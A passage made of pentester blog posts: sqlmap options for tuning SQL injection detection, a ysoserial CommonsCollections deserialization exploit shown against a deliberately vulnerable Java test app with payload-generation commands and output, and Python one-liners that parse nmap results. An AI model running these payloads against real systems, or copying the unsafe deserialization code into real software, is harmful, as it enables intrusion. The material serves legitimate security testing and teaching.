<br/><br/><br/><h4><span style="font-size: large;">Verbosity and debugging injection checks</span></h4><br/>One extremely useful option for troubleshooting sqlmap's detection process is the output verbosity option. The specific setting I use most frequently when getting an injection working is -v3, which will show each raw payload that is sent by sqlmap. This allows you to compare the payloads sent by sqlmap to your own POC SQL injection string developed during discovery of the vulnerability, to determine where sqlmap is incorrectly diverging. If you need to use tamper scripts as well to bypass a filter, you can try verbosity level -v4 to also see the HTTP requests sent, as -v3 verbosity will not show the effect of tamper scripts.<br/><br/><blockquote class="tr_bq"><b>Note</b>: You can also configure sqlmap to work through an intercepting proxy for debugging purposes. However, while I generally always have Burp Suite running when I'm testing any web application, I usually prefer to avoid filling up my proxy history and slowing down the operation of sqlmap by doing this. Sometimes, if I really want to have a close look at requests and responses, I will run up a separate proxy instance using something like <a href="https://github.com/zaproxy/zaproxy">ZA Proxy</a>.</blockquote><br/><h4><br/><span style="font-size: large;">Auto answering</span></h4><br/>Under certain circumstances, sqlmap will ask you the same set of one or more questions every time you run the tool. Some of these questions have no associated command line options, and therefore no obvious way to tell sqlmap the desired behavior so you don't have to repeatedly answer the same question the same way every time sqlmap prompts you. The --answers option allows you to provide a standard response to these questions - to use it, pick a unique term from the question itself, and provide this along with the desired response.<br/><br/>For example, to preemptively answer Yes to allow sqlmap to attempt to "optimize" timing settings during blind time based injections, use the following.<br/><br/><pre class="code">--answers='optimize=Y'</pre><br/><h4><span style="font-size: large;">Session flushing</span></h4><br/>sqlmap keeps session information about each URL, including which techniques and payloads have been confirmed to work and what data has been retrieved from the site. If a non-optimal payload type has been associated with a particular URL within the relevant session, you may want to clear that session information in order to try and get a new payload to work. You can flush all data associated with a URL, and force the detection process to run again, using the following option.<br/><br/><pre class="code">--flush-session</pre><br/><h4><br/><span style="font-size: large;">Other options</span></h4><br/>Some other options I commonly use are the parameter option, which specifies which parameter is used to perform the injection (e.g. -p 'vulnerable_parameter'), and the options to specify the database (e.g. --dbms='mysql') and the Operating System (--os='linux') in use on the remote server. These all help sqlmap avoid making extraneous requests beyond what you already know will be effective, based on your knowledge of the target web application. Sometimes of course the injection point is not within a parameter, in which case sqlmap has other options that can be used to target its operation, such as the asterisk character (*), which can be used to set a manual injection point within a request.
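<br/><br/>Putting a few of these together, a tightly focused detection run against a known MySQL/Linux target, with the asterisk marking the injection point inside the id parameter, might look like this (the URL is again hypothetical):<br/><br/><pre class="code">sqlmap -u 'http://testsite.local/products.php?id=1*&sort=name' --dbms=mysql --os=linux --technique=B -v3</pre>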
<br/><br/><br/><h3>Tweaking sqlmap options to detect tricky injections</h3><br/>Before you can use sqlmap to effectively exploit an injection issue, you must get it to detect the vulnerability, which associates one or more injection techniques and payloads with the URL of the issue. Once this has occurred, the detection process does not need to run again, and sqlmap's options for exploitation and data retrieval can be immediately used on subsequent executions of the tool.<br/><br/>The following is the process I use for taking a manually discovered SQL injection vulnerability and configuring sqlmap to exploit it.<br/><ol><li>Develop the manual exploit to the point where a POC for the best applicable exploitation technique exists. For a UNION SELECT vulnerability, this means you want to discover the number of columns in the UNION, and perhaps also the datatypes of each column (numeric, text, date, etc). For a boolean blind, you will want to be able to trigger different page responses for True and False conditions, and determine how you can differentiate the True response from the False. For a time based blind, you want to get a response to delay for a given period of seconds based on the success or failure of some comparison you make, etc. This step also includes working out whether any specific characters are restricted by some sort of filter or other application issue, and hence are unusable in performing the injection.</li><br/><li>Run sqlmap, configuring the backend database type (--dbms), Operating System (--os) and technique (--technique) options to specifically target the manually discovered issue. Set the parameter (-p) option as well if the injection is in a URL or POST data parameter, or use other options such as the injection point asterisk (*) as appropriate to tell sqlmap exactly where the injection is located. This helps focus the detection process, minimising requests sent and time taken by ignoring non-vulnerable parameters and payloads that target other databases or are associated with unwanted injection techniques. You may also need to provide proxy details, cookies or other authentication options, CSRF management options, safe URL settings to avoid lockouts, etc as appropriate, to ensure that sqlmap can correctly send and receive HTTP requests and responses. If you have already created a manual injection POC in a separate tool, you should already know all the correct settings to use for this purpose. Leave all other options at the default. I do all my manual testing using Burp Suite Professional, so I use the <a href="https://github.com/JGillam/burp-co2">CO2 plugin</a> and its SQLMapper component to quickly set the relevant command line options. From this point on in the process, as soon as you get sqlmap to detect the vulnerability, you can skip the remaining steps (hopefully that's obvious).</li><br/><li>Run the detection again, however this time with the -v3 verbose option on, so you can see the payloads being sent. Scroll through the output, looking for an injection string that's similar in layout to the POC developed earlier, and will cause the response you require. At this point you may see the names of likely looking payloads that are not being sent because the --level or --risk settings are too low. If so, raise these values, try again, and see if you can find an appropriate payload that comes as close as possible to what you need.</li><br/><li>If at this point you still do not see a payload that looks like it will be able to provide the output needed to make the injection succeed, you will need to write your own. Pick an example that's as close as possible to what you need from the XML file named after the appropriate injection technique, and modify it as required. The earlier section on custom test payloads contains references that help describe this process, and a future post in this series will also have a specific example.</li><br/><li>Once sqlmap is sending a payload that is logically similar to your POC, the goal is to tweak the relevant sqlmap options to get the request syntactically correct for the injection. At this point you will want to set the --test-filter option in order to send only your chosen payload, and try and determine what needs to change with the payload to make it work. By "work" I mean that you must be creating injected queries that are syntactically correct, and the results must not involve database errors, displayed to you or otherwise, UNLESS you are doing error based injection and that error is displayed to you and contains your chosen content. This troubleshooting may involve taking the payload from the sqlmap verbose output and pasting it into your manual testing tool (e.g. Burp Suite Professional's Repeater) to see if it returns a syntactically correct result. Sometimes, however, you can just eyeball it and tell where there are some obvious issues. The next step provides guidance on how to fix syntax issues.</li><br/><li>If the payload being sent is resulting in a SQL query that is NOT syntactically correct, there are three primary reasons for this. Work out which issue (or combination of issues) is causing the problem, and work to resolve these as discussed below before moving on to the next step.</li><br/><ul><li>The first possible reason is that the prefix and suffix have been set incorrectly (either manually by you or automatically by sqlmap). You know this is the case if the text used at the start of the payload to break into the injection, or the text at the end used to terminate it, are syntactically different from your POC. Correctly set the suffix and prefix options to fix this - the right values should be easy to identify, as they will be included in your manual POC. Be aware here that certain test payloads are configured to place random values at the start of the payload output. If you set the --prefix option and don't see the configured string at the very start of the payload shown in sqlmap's verbose output, you know that the payload configuration itself is the cause (specifically, the where option in the payload configuration), which is the second possible reason.</li>
<li>Second, the definition of the test payload itself is causing an error for some reason. I have seen the sqlmap default payloads break in some cases, but the most likely way for this to occur is when you have written the payload yourself. If the text, the logic or the placement of the random values used by sqlmap in the meat of the payload is causing the issue, the problem might be with the definition of the test payload (or you might be focusing on the wrong payload, and another one you have overlooked is more appropriate). Modify the payload, try a different one, or create your own custom one to fix this.</li><li>Third, there is some sort of filter implemented in the space between when you send the request and when the resultant query reaches the database that is causing an otherwise syntactically correct payload to be rejected. This is where tamper scripts can be used to (hopefully) filter out or replace the offending characters. Don't forget to bump your verbosity setting to -v4 in order to see HTTP requests in the output if you need to troubleshoot these. You can either use one of the existing tamper scripts (if a suitable one exists) or write your own. If the filtering is particularly prohibitive, you may need to consider writing a payload that makes use of inventive SQL to avoid the bad patterns in question.</li></ul><br/><li>Once your queries are syntactically correct, the next step is ensuring that sqlmap can correctly interpret the results it is receiving (and, in the case of second order injections, that it is receiving the correct results at all!). Setting aside second-order injections for the moment (we will cover these in more detail in a future example), sqlmap is generally pretty good at this for all of its techniques other than boolean blind injection. For that technique, you will often need to tell it how to distinguish True from False responses. This is where the detection options such as --string, --not-string and --regexp discussed earlier come into play - use these to help sqlmap identify the appropriate responses.</li><br/></ol><br/><br/>Once you have completed these steps, sqlmap should have correctly detected your vulnerability and be ready to exploit it.<br/><br/>This completes this entry in the series - stay tuned for the next post, where I will show some examples.Stephen Bradshaw
CommonCollections deserialization attack payloads from ysoserial failing on > JRE 8u722016-05-01T05:27:00+00:002016-05-01T05:27:00+00:00/2016/05/01/commoncollections-deserializationRecently, while trying to exploit a Java app vulnerable to a <a href="https://www.owasp.org/index.php/Deserialization_of_untrusted_data">deserialisation attack</a>, I was having some issues getting the CommonsCollections1 payload from <a href="https://github.com/frohoff/ysoserial">ysoserial</a> working. In case you're not familiar with this, essentially the <a href="https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread"><=3.2.1 versions of the Apache Commons Collections library</a> can be used to create attack payloads of serialized Java data that will execute local commands on systems running Java applications that deserialize untrusted, attacker supplied content. The ysoserial tool enables an attacker to create a number of different serialized Java attack payloads, making use of a wide variety of commonly used Java libraries. The CommonsCollections1 payload is one of those targeting the CommonsCollections 3 branch.<br/><br/>This was a little frustrating, because I had used this exact payload multiple times in the past on pentests with great success. Some further investigation was required to figure out what was happening here.<br/><br/>During some testing on my local system, using a very simple vulnerable test application, I found that the payloads did not seem to work when run against Java apps executed on Oracle Java 1.8u91, but worked fine on Oracle Java 1.7u80.
<br/><br/>Here's the vulnerable Java code, "SerializeTest.java", I was using for testing. It takes a single input parameter of a filename, then reads the contents of that file and tries to deserialise it. The code makes reference to the Java Commons Collections library, which allows us to use the appropriate versions of the Commons Collections payloads from ysoserial to exploit this application, as long as the matching vulnerable version of the Commons Collections library is on the application's class path when we run it.<br/><br/><pre class="prettyprint">import java.io.ObjectInputStream;<br/>import java.io.ByteArrayInputStream;<br/>import java.nio.file.Files;<br/>import java.nio.file.Path;<br/>import java.nio.file.Paths;<br/>import java.io.InputStream;<br/>import org.apache.commons.collections.*;<br/> <br/>public class SerializeTest{<br/> public static void main(String args[]) throws Exception{<br/> // reference a Commons Collections type so the library must be on the class path<br/> Bag bag = new HashBag();<br/> Path path = Paths.get(args[0]);<br/> byte[] data = Files.readAllBytes(path);<br/> InputStream d = new ByteArrayInputStream(data);<br/> ObjectInputStream ois = new ObjectInputStream(d);<br/> // the vulnerable operation: deserialise untrusted file content<br/> ois.readObject();<br/> }<br/>}<br/></pre>
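<br/><br/>As an aside, if you want to reproduce this test locally, the class compiles with the vulnerable library on the class path, something like the following (the jar path here is an assumption matching my directory layout):<br/><br/><pre class="code">javac -cp ../lib/commons-collections-3.2.jar SerializeTest.java</pre>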
<br/><br/>I have included the command output showing the results of my testing below. During the testing, I create a file containing malicious serialised Java data at /tmp/CommonsCollections1.bin with ysoserial, then try and read it with my vulnerable Java app using different versions of the Java runtime.<br/><br/>The following command creates a CommonsCollections1 payload file. This payload should create the file /tmp/pwned if deserialised by a Java application that has a vulnerable version of the Apache Commons Collections 3.x library on the class path.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > /tmp/CommonsCollections1.bin<br/></pre><br/><br/>Now, we try and read that payload file using our vulnerable Java application, running it with the default Java JRE on my machine, which happens to be Java 1.8.0_91. The expectation is that this will work and run our payload, creating the file /tmp/pwned. When running the application, I have set the class path to point to a copy of the Commons Collections 3.2 library.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -version<br/>java version "1.8.0_91"<br/>Java(TM) SE Runtime Environment (build 1.8.0_91-b14)<br/>Java HotSpot(TM) 64-Bit Server VM (build 25.91-b14, mixed mode)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin <br/>Exception in thread "main" java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet<br/> at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)<br/> at com.sun.proxy.$Proxy0.entrySet(Unknown Source)<br/> at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)<br/> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)<br/> at java.lang.reflect.Method.invoke(Method.java:498)<br/> at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)<br/> at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)<br/> at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)<br/> at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)<br/> at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)<br/> at SerializeTest.main(SerializeTest.java:17)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned<br/>ls: cannot access '/tmp/pwned': No such file or directory<br/></pre><br/><br/>The file /tmp/pwned doesn't exist. Strange. Let's try running the vulnerable application using an older version of Java.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -version<br/>java version "1.7.0_80"<br/>Java(TM) SE Runtime Environment (build 1.7.0_80-b15)<br/>Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ /usr/lib/jvm/java-7-oracle/bin/java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections1.bin <br/>Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set<br/> at com.sun.proxy.$Proxy0.entrySet(Unknown Source)<br/> at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)<br/> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)<br/> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)<br/> at java.lang.reflect.Method.invoke(Method.java:606)<br/> at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)<br/> at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893)<br/> at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798)<br/> at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)<br/> at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)<br/> at SerializeTest.main(SerializeTest.java:17)<br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned<br/>/tmp/pwned<br/></pre><br/><br/>OK, that worked - /tmp/pwned exists, proof of pwnage.
Same Java application, same malicious serialized payload, same vulnerable version of the Commons Collections library - the only thing different between these two exploitation attempts is the version of the JRE being used to run the vulnerable app. Note the different Java error messages produced by the two executions of the program. The second error is an expected one, the first however is not. Some Googling for the unexpected "java.lang.Override missing element" error I was receiving led me to <a href="https://github.com/frohoff/ysoserial/issues/17">this issue</a> on the ysoserial tracker on GitHub (and yes, I probably should have just checked there before the hours of testing).<br/><br/>So, some changes made to the VM in December last year, in JRE 8u72, just after the Java deserialisation attack blew up in the security community with the <a href="https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">Foxglove security post</a>, appear to break this gadget chain. Is there a way around this so we can get our sploit on? As it turns out, the answer is yes. <a href="https://github.com/frohoff/ysoserial/pull/26">A workaround</a> has been added to the ysoserial 0.0.5 snapshot branch on GitHub.<br/><br/>Grab the latest snapshot of ysoserial via git, and build it using Maven like so.<br/><br/><pre class="code">mvn -DskipTests clean package<br/></pre><br/><br/>This will create a 0.0.5 snapshot version of ysoserial. Then, build an exploit using the CommonsCollections5 payload, which relies on a different gadget chain that still functions on newer JRE versions.<br/><br/><pre class="code">stephen@ubuntu:~/workspace/SerializeTest/bin$ java -jar ~/Downloads/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'touch /tmp/pwned2.0' > /tmp/CommonsCollections5.bin <br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ java -cp .:../lib/commons-collections-3.2.jar SerializeTest /tmp/CommonsCollections5.bin <br/>stephen@ubuntu:~/workspace/SerializeTest/bin$ ls /tmp/pwned2.0 <br/>/tmp/pwned2.0<br/></pre>Stephen Bradshaw
Stephen Bradshaw
List comprehension one liners to extract info from nmap scans using Python and libnmap2016-04-30T13:37:00+00:002016-04-30T13:37:00+00:00/2016/04/30/list-comprehension-one-liners-to<br/>When I perform internal penetration tests where a large number of hosts and services are involved, it's useful to be able to quickly extract certain sets of information in an automated fashion from nmap scan data. This is useful for performing automated tests against various service types, such as directory brute forcing on web servers, SSL/TLS cipher and protocol testing on SSL/TLS servers, and other targeted tests on particular products or protocols.<br/><br/>I do a lot of my processing during a pentest either from IPython or the *nix shell, so being able to access this information from Python, where I can use it directly in scripts or the REPL, or write it to disk to access using shell commands, is extremely useful.<br/><br/>To this end, the <a href="https://pypi.python.org/pypi/python-libnmap">libnmap</a> library proves extremely useful. This post will cover a number of list comprehension "one liners" that can be used with the aid of the NmapParser library from libnmap to populate this information into a Python environment, where it can then be easily used for other purposes such as running a loop of other actions, or writing it to disk in a text file.<br/><br/>This is largely for my own use, so I don't forget these techniques, but hopefully other people find this useful as well. I'm hoping that this post does more than just give you a list of code to copy and paste, and also gives you an appreciation of how useful IPython is as a data processing tool for pentesting.<br/><br/>I may add to this post in future if I have other commonly used patterns that I think would be useful.<br/><br/><br/><h3>Setup</h3><br/>The first step in being able to parse nmap scan data is doing an nmap scan. I won't go into too much detail about how this is done, but to use the code in this post you will need to have saved your scan results to an xml file (options -oX or -oA) and have performed service detection (-sV) and run scripts (-sC) on the open ports (an example invocation is shown at the end of this section).<br/><br/>The rest of the commands in this post will assume you are working from a Python REPL environment such as <a href="https://ipython.org/">IPython</a>, and have installed the libnmap module (which you can do using easy_install or pip).<br/><br/>To start off with, you need to set up the environment, by importing the NmapParser module and then reading in your xml scan results file (named "up_hosts_all_ports_fullscan.xml" and located in the present working directory in the example below).<br/><br/><pre class="code">from libnmap.parser import NmapParser<br/>nmap_report = NmapParser.parse_fromfile('up_hosts_all_ports_fullscan.xml')</pre><br/><br/>The rest of this post will cover various one-liners that generate lists with various useful groupings of information. The examples all assume that the nmap scan data resides in a variable named nmap_report, as generated in the example above.
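<br/><br/>As a reference point, a scan invocation along the following lines will produce a suitable XML input file. The target range here is purely a placeholder, and -p- (all TCP ports) is an assumption to match the "all_ports" file naming used above.<br/><br/><pre class="code">nmap -sV -sC -p- -oX up_hosts_all_ports_fullscan.xml 192.168.1.0/24</pre>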
The base list comprehension lines are given in the examples below, and if you paste these directly into the IPython REPL in which you have already run the instructions above, the output will be dumped directly to the console so you can view it. I usually do this first before taking other steps, so I can confirm the data "looks" as expected.<br/><br/>Then, you can optionally preface these lines with a variable name and an equals sign ("=") to assign the data to a variable so you can use it in future Python code, or surround them with a join and a write to save the output to disk so you can work on it with shell commands. You could also paste the snippets into a Python script if it's something you might want to use multiple times, or if you want to incorporate some more complex logic that would become awkward in a REPL environment. I'll include a section at the end that shows you how to quickly perform these operations.<br/><br/><br/><h3>Port information</h3><b>Hosts with a given open port</b><br/><br/>Show all hosts that have a given port open. Generates a list of host addresses as strings. Port 443 is used in the example below; change this to your desired value.<br/><br/><pre class="code">[ a.address for a in nmap_report.hosts if (a.get_open_ports()) and 443 in [b[0] for b in a.get_open_ports()] ]</pre><br/><br/><b>Unique port numbers found open</b><br/><br/>Show a unique list of the port numbers that are open on various hosts. Generates a list of port numbers, as ints, sorted numerically.<br/><br/><pre class="code">sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]), key=int)</pre><br/><br/><b>Hosts serving each open port, grouped by port</b><br/><br/>Show all open ports and the hosts that have them open, grouped by port and sorted in port order. Generates a list of lists, where the first item of each member list is the port number as an int, and the second item is a list of the IP addresses, as strings, that have that port open.<br/><br/><pre class="code">[ [a, [ b.address for b in nmap_report.hosts for c in b.get_open_ports() if a==c[0] ] ] for a in sorted(set([ b[0] for a in nmap_report.hosts for b in a.get_open_ports()]),key=int) ]</pre><br/><br/><h3>SSL/TLS and HTTP/HTTPS</h3><b>Host and port combinations with SSL</b><br/><br/>Show all host and port combinations with SSL/TLS. This works by looking for any reference to the service being tunneled over "ssl", or for script results that reference a pem certificate. Generates a list of lists, where each list item includes the host address as a string, and the port as an int.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/>The following includes the same information as the above, a list of all SSL enabled host and port combinations, except that instead of a list of lists, I have used the join function to create a list of host:port strings.<br/><br/><pre class="code">[ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/><b>Host and port combinations serving websites</b><br/><br/>Show all websites, including the port and protocol (http or https). This generates a list of lists, where each child list contains the protocol as a string, the address as a string and the port number as an int.
There is some inconsistency in the way that nmap reports on https sites (sometimes the service is "https", and other times the service is "http" with an "ssl" tunnel), so I have performed some munging of field data to make the output here consistent.<br/><br/><pre class="code">[ [(b.service + b.tunnel).replace('sl',''), a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/>Here is the same information as the above, but instead of a list of lists with protocol, host and port as separate items, it joins all these together to provide a list of URLs as strings.<br/><br/><pre class="code">[ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/><h3>Other Service Information</h3><b>Unidentified services</b><br/><br/>Show all of the services that nmap could not identify during its service enumeration. Generates a list of lists where each child list contains the address as a string, the port as an int, and the nmap service fingerprint as a string. I usually generate this information for manual review of those particular services, and don't do anything automated with the output, but it's still nice to be able to produce it quickly for easy review.<br/><br/><pre class="code">[ [ a.address, b.port, b.servicefp ] for a in nmap_report.hosts for b in a.services if (b.service =='unknown' or b.servicefp) and b.port in [c[0] for c in a.get_open_ports()] ]</pre><br/><br/><b>Software products identified by nmap</b><br/><br/>Show a unique list of the products that nmap identified during the scan. Generates a sorted list of strings for each product.<br/><br/><pre class="code">sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner]))</pre><br/><br/><b>Host and port combinations serving software products, grouped by product</b><br/><br/>Show each software product, with the hosts and ports where it is served, grouped by product. Generates a list of lists, where each child has a first element of the product name as a string, followed by a list of lists, where each child list contains the address as a string, and the port number as an int.<br/><br/><pre class="code">[ [ a, [ [b.address, c.port] for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]</pre><br/><br/>The same as the above, showing each product with the hosts and ports where it is enabled, grouped by product, but with a slightly different presentation. This generates a list of lists, where the first element in each list is the product name as a string, and the second element is a list of host:port combinations as strings.<br/><br/><pre class="code">[ [ a, [ ':'.join([b.address, str(c.port)]) for b in nmap_report.hosts for c in b.services if c.banner==a] ] for a in sorted(set([ b.banner for a in nmap_report.hosts for b in a.services if 'product' in b.banner])) ]</pre><br/><br/><b>Host and port combinations serving services relating to a particular search string</b><br/><br/>Show all the hosts and ports that relate to a given (case sensitive) search string, which can appear anywhere in a raw text dump of all the service information provided by nmap, covering the product name, the service name, etc. The string "Oracle" is used in the example below.
Can be used to create a more generalised, or alternatively a more specific, grouping of services than the snippet above. Generates a list of lists, where each child list contains the address of a host as a string and the port as an int.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'Oracle' in str(b.get_dict()) + str(b.scripts_results) ]</pre><br/><br/>Shows the same as the above, all host and port combinations that match a given search string, but in this case it's modified to match against a service information dump that's all in lower case. Use lower case search strings here (the example is a lower case "oracle"). Generates output in the same format as the example above.<br/><br/><pre class="code">[ [a.address, b.port] for a in nmap_report.hosts for b in a.services if b.open() and 'oracle' in (str(b.get_dict()) + str(b.scripts_results)).lower() ]</pre><br/><br/><h3>Random Stuff</h3><b>Common Name from Certificate Subject</b><br/><br/>Shows the common name field from any SSL certificates found and parsed by nmap during a script scan. Can be useful to determine the system's host name if you only started with an IP address and reverse DNS doesn't work. Generates a list of lists, each containing the IP address and the extracted host name as strings. (Note that dict.has_key only exists on Python 2; on Python 3, use 'elements' in c and 'subject' in c['elements'] instead.)<br/><br/><pre class="code">[ [a.address, c['elements']['subject']['commonName'] ] for a in nmap_report.hosts for b in a.services for c in b.scripts_results if c.has_key('elements') and c['elements'].has_key('subject') ]</pre><br/><br/><h3>Ways to use the results</h3>As mentioned earlier, the examples above, when pasted into your IPython REPL, will just dump the output to screen, where you can look at it. That's nice, because it allows you to see the data you're interested in, ensure it passes the "smell" test, etc., but you probably want to do other stuff with it as well. One of the benefits of generating the information above in this way is that you can easily perform some further automated action with the result.<br/><br/>If you're already familiar with Python, it will be pretty easy for you to perform these other types of tasks, and you can skip this section, but for those who are not, it provides some basic pointers on how you can make use of these snippets.<br/><br/><br/><b>Saving to disk</b><br/><br/>If you want to write the output of one of the snippets to a text file on disk, you need to join the list together in an appropriate string format (depending on your use case) and then actually write it out to a file. In Python, we can join the list to a string using the join function, and write it to disk using open and write. Here's an example.<br/><br/>Let's say we want to take our generated list of hosts and ports that support SSL, and write them out to a newline separated file so we can do a for loop in bash and test each combination for secure SSL usage using a command line tool (are the ciphers correct, are bad protocols like SSLv2 or SSLv3 enabled, etc.). I would do all of this in a giant one liner in IPython, because that's the sort of thing that amuses me, but I will break it down into individual lines of code here for readability.<br/><br/>Our list comprehension from above, which generates a list of host:port strings, is as follows.
Note how we use the str function around the port number to convert it from an int to a string, so it can be joined together with other strings. This is something to be aware of when manipulating this sort of data, and it caught me out a lot when I was first learning to use Python.<br/><br/><pre class="code">[ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ]</pre><br/><br/>Let's assign it to a variable named "ssl_services" to make it easier to work with.<br/><br/><pre class="code">ssl_services = [ ':'.join([a.address, str(b.port)]) for a in nmap_report.hosts for b in a.services if b.tunnel=='ssl' or "'pem'" in str(b.scripts_results) ] </pre><br/><br/>Now, let's join each list element together with newlines ('\n'), using Python's join function, and assign the result to a new variable, "ssl_services_text".<br/><br/><pre class="code">ssl_services_text = '\n'.join(ssl_services)</pre><br/><br/>Now, we can create a new file "ssl_services_file.txt" in the present working directory, and write the contents of our ssl_services_text variable to it.<br/><br/><pre class="code">open('ssl_services_file.txt','w').write(ssl_services_text)</pre><br/><br/>Easy. Now you can bash away at the file to your heart's content.<br/><br/><br/><b>Using with other Python code</b><br/><br/>Perhaps you want to use the list comprehensions above in other Python code? That's easy too. Here's a simple example, where we will loop through each of the websites identified from nmap, and see the result of requesting a particular page from each site.<br/><br/>Here's the list comprehension that generates the list of URLs. We will assign it directly to a variable called "urls".<br/><br/><pre class="code">urls = [ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ]</pre><br/><br/>Next, we do some prep work: import the <a href="http://docs.python-requests.org/en/master/">requests</a> module and set up a simple helper function that makes a web request and saves the result to a file on disk, with an autogenerated name based on the URL. You will note below that the get request uses the "verify=False" option, which ignores certificate validation errors when making the request, something that's often necessary when testing internally on machines that may not trust the certificate authorities used to sign SSL certificates.<br/><br/><pre class="code">import requests<br/><br/>def getAndSave(url):<br/> r = requests.get(url, verify=False)<br/> open('_'.join(url.split('/')[2:]).replace(':',''),'wb').write(r.text.encode('utf8'))<br/></pre><br/><br/>Now, we will add some code to iterate through each of the base URLs from nmap, and request the robots.txt file for each site so that it can be saved to disk for our later perusal.<br/><br/><pre class="code">for a in urls:<br/> getAndSave(a + 'robots.txt')</pre><br/><br/>This will request the robots.txt from each of the sites in turn, and save it to disk in the current working directory.
This is just a very simple example (there's not even any error checking in the getAndSave function), but it hopefully gives you an idea of what's possible. A variant of the helper with some basic error handling is sketched below.<br/><br/>
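For illustration, here is one way you might add that error handling. This is just a sketch; the timeout value and the adjusted filename scheme are arbitrary choices of mine.<br/><br/><pre class="code">import requests<br/><br/>def getAndSave(url):<br/>    # derive a filename from the URL, e.g. http://10.0.0.1:80/robots.txt -> 10.0.0.1_80_robots.txt<br/>    fname = '_'.join(url.split('/')[2:]).replace(':', '_')<br/>    try:<br/>        r = requests.get(url, verify=False, timeout=10)<br/>        r.raise_for_status()  # treat 4xx/5xx responses as failures<br/>    except requests.exceptions.RequestException as e:<br/>        print('failed for ' + url + ': ' + str(e))<br/>        return<br/>    open(fname, 'wb').write(r.text.encode('utf8'))</pre>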
<br/><br/><h3>Conclusion</h3>Hope you found this useful, and that it gave you an appreciation of how useful and flexible Python can be when parsing nmap scan data.<br/><br/>Are there any other common tasks you perform with nmap scan data that you would like a one-liner for? Leave a comment!Stephen Bradshaw